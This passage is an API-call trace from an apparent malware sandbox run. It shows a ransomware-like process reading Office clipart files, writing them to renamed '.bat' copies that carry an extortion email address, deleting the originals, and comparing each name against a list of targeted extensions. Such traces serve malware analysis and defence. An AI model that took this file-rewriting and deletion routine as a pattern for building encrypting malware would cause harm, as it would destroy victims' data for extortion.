lpOverlapped=0x0) returned 1 [0182.739] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.739] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.739] SetEndOfFile (hFile=0x380) returned 1 [0182.739] CloseHandle (hObject=0x380) returned 1 [0182.739] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.739] SetEndOfFile (hFile=0x334) returned 1 [0182.740] CloseHandle (hObject=0x334) returned 1 [0182.740] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.741] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf")) returned 1 [0182.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.741] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.741] lstrlenW (lpString=".doc") returned 4 [0182.741] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.741] lstrlenW (lpString=".docx") returned 5 [0182.741] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.741] lstrlenW (lpString=".pdf") returned 4 [0182.741] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.741] lstrlenW (lpString=".xls") returned 4 [0182.741] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.741] lstrlenW (lpString=".xlsx") returned 5 [0182.741] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.741] lstrlenW (lpString=".ppt") returned 4 [0182.742] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.742] lstrlenW (lpString=".zip") returned 4 [0182.742] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.742] lstrlenW (lpString=".rar") returned 4 [0182.742] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.742] lstrlenW (lpString=".bz2") returned 4 [0182.742] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.742] lstrlenW (lpString=".7z") returned 3 [0182.742] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.742] lstrlenW (lpString=".dbf") returned 4 [0182.742] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.742] lstrlenW (lpString=".1cd") returned 4 [0182.742] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.742] lstrlenW (lpString=".jpg") returned 4 [0182.742] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.742] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.742] lstrlenW (lpString=".doc") returned 4 [0182.742] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.742] lstrlenW (lpString=".docx") returned 5 [0182.742] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.743] lstrlenW (lpString=".pdf") returned 4 [0182.743] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.743] lstrlenW (lpString=".xls") returned 4 [0182.743] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.743] lstrlenW (lpString=".xlsx") returned 5 [0182.743] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.743] lstrlenW (lpString=".ppt") returned 4 [0182.743] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.743] lstrlenW (lpString=".zip") returned 4 [0182.743] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.743] lstrlenW (lpString=".rar") returned 4 [0182.743] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.743] lstrlenW (lpString=".bz2") returned 4 [0182.743] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.743] lstrlenW (lpString=".7z") returned 3 [0182.743] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.744] lstrlenW (lpString=".dbf") returned 4 [0182.744] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.744] lstrlenW (lpString=".1cd") returned 4 [0182.744] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF") returned 68 [0182.744] lstrlenW (lpString=".jpg") returned 4 [0182.744] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.745] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.745] lstrlenW (lpString="J0107024.WMF") returned 12 [0182.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.746] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=3020) returned 1 [0182.746] CloseHandle (hObject=0x334) returned 1 [0182.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf")) returned 0x220 [0182.746] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.746] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.747] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.747] GetLastError () returned 0x0 [0182.747] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xbcc, lpOverlapped=0x0) returned 1 [0182.749] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xbd0, lpOverlapped=0x0) returned 1 [0182.750] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.750] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.751] SetEndOfFile (hFile=0x380) returned 1 [0182.751] CloseHandle (hObject=0x380) returned 1 [0182.751] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.751] SetEndOfFile (hFile=0x334) returned 1 [0182.752] CloseHandle (hObject=0x334) returned 1 [0182.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.754] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf")) returned 1 [0182.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.754] lstrlenW (lpString=".doc") returned 4 [0182.754] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.754] lstrlenW (lpString=".docx") returned 5 [0182.755] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.755] lstrlenW (lpString=".pdf") returned 4 [0182.755] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.755] lstrlenW (lpString=".xls") returned 4 [0182.755] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.755] lstrlenW (lpString=".xlsx") returned 5 [0182.755] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.755] lstrlenW (lpString=".ppt") returned 4 [0182.755] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.755] lstrlenW (lpString=".zip") returned 4 [0182.755] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.755] lstrlenW (lpString=".rar") returned 4 [0182.755] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.755] lstrlenW (lpString=".bz2") returned 4 [0182.755] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.755] lstrlenW (lpString=".7z") returned 3 [0182.755] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.755] lstrlenW (lpString=".dbf") returned 4 [0182.755] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.755] lstrlenW (lpString=".1cd") returned 4 [0182.755] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.755] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.755] lstrlenW (lpString=".jpg") returned 4 [0182.755] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.756] lstrlenW (lpString=".doc") returned 4 [0182.756] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.756] lstrlenW (lpString=".docx") returned 5 [0182.756] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.756] lstrlenW (lpString=".pdf") returned 4 [0182.756] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.756] lstrlenW (lpString=".xls") returned 4 [0182.756] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.756] lstrlenW (lpString=".xlsx") returned 5 [0182.756] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.756] lstrlenW (lpString=".ppt") returned 4 [0182.756] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.756] lstrlenW (lpString=".zip") returned 4 [0182.756] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.756] lstrlenW (lpString=".rar") returned 4 [0182.756] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.756] lstrlenW (lpString=".bz2") returned 4 [0182.756] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.756] lstrlenW (lpString=".7z") returned 3 [0182.756] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.756] lstrlenW (lpString=".dbf") returned 4 [0182.756] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.756] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.757] lstrlenW (lpString=".1cd") returned 4 [0182.757] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.757] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 68 [0182.757] lstrlenW (lpString=".jpg") returned 4 [0182.757] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.757] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.757] lstrlenW (lpString="J0107026.WMF") returned 12 [0182.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.757] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=7632) returned 1 [0182.757] CloseHandle (hObject=0x334) returned 1 [0182.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf")) returned 0x220 [0182.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.758] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.758] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.758] GetLastError () returned 0x0 [0182.759] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1dd0, lpOverlapped=0x0) returned 1 [0182.761] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1de0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1de0, lpOverlapped=0x0) returned 1 [0182.762] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.762] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.762] SetEndOfFile (hFile=0x380) returned 1 [0182.762] CloseHandle (hObject=0x380) returned 1 [0182.763] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.763] SetEndOfFile (hFile=0x334) returned 1 [0182.764] CloseHandle (hObject=0x334) returned 1 [0182.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.764] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf")) returned 1 [0182.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.765] lstrlenW (lpString=".doc") returned 4 [0182.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.765] lstrlenW (lpString=".docx") returned 5 [0182.765] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.765] lstrlenW (lpString=".pdf") returned 4 [0182.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.765] lstrlenW (lpString=".xls") returned 4 [0182.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.765] lstrlenW (lpString=".xlsx") returned 5 [0182.765] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.765] lstrlenW (lpString=".ppt") returned 4 [0182.765] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.765] lstrlenW (lpString=".zip") returned 4 [0182.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.765] lstrlenW (lpString=".rar") returned 4 [0182.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.765] lstrlenW (lpString=".bz2") returned 4 [0182.765] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.765] lstrlenW (lpString=".7z") returned 3 [0182.765] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.765] lstrlenW (lpString=".dbf") returned 4 [0182.765] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.765] lstrlenW (lpString=".1cd") returned 4 [0182.765] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.765] lstrlenW (lpString=".jpg") returned 4 [0182.765] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.765] lstrlenW (lpString=".doc") returned 4 [0182.766] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.766] lstrlenW (lpString=".docx") returned 5 [0182.766] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.766] lstrlenW (lpString=".pdf") returned 4 [0182.766] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.766] lstrlenW (lpString=".xls") returned 4 [0182.766] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.766] lstrlenW (lpString=".xlsx") returned 5 [0182.766] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.766] lstrlenW (lpString=".ppt") returned 4 [0182.766] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.766] lstrlenW (lpString=".zip") returned 4 [0182.766] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.766] lstrlenW (lpString=".rar") returned 4 [0182.766] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.766] lstrlenW (lpString=".bz2") returned 4 [0182.766] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.766] lstrlenW (lpString=".7z") returned 3 [0182.766] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.766] lstrlenW (lpString=".dbf") returned 4 [0182.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.766] lstrlenW (lpString=".1cd") returned 4 [0182.766] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 68 [0182.766] lstrlenW (lpString=".jpg") returned 4 [0182.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.767] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.767] lstrlenW (lpString="J0107042.WMF") returned 12 [0182.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.767] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=9048) returned 1 [0182.767] CloseHandle (hObject=0x334) returned 1 [0182.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf")) returned 0x220 [0182.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.767] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.767] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.768] GetLastError () returned 0x0 [0182.768] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2358, lpOverlapped=0x0) returned 1 [0182.770] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2360, lpOverlapped=0x0) returned 1 [0183.112] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.112] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.112] SetEndOfFile (hFile=0x380) returned 1 [0183.112] CloseHandle 